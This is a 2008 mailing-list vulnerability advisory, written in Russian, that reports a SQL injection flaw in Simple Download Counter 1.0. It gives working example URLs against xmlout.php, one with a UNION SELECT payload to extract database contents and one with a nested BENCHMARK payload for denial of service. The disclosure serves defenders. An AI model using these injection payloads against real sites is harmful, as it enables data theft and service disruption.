Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

VMSA-2008-0015 Updated ESXi and ESX 3.5 packages address critical security issue in openwsman

Advanced Electron Forum <= 1.0.6 Remote Code Execution

Annuaire Téléphoniqu e v1.0 Sensetive Files (MDP)

PHP pro bid v 6.04 SQL injection

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	20.09.2008
Subject:	SQL Injection vulnerability in Simple Download Counter

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною SQL Injection уязвимости в Simple Download Counter.

SQL Injection:

Её можно использовать как для получения информации (в частности других веб приложений) с БД:

http://site/xmlout.
php?file='%20union%20select%20*%20from%20table/*

Так и для проведения DoS атак:

http://site/xmlout.php?file='%20and%20benchmark(10000000,
benchmark(10000000,md5(now())))/*

Атака возможна при magic quotes off. Уязвима версия Simple Download Counter 1.0.

Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/2448/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua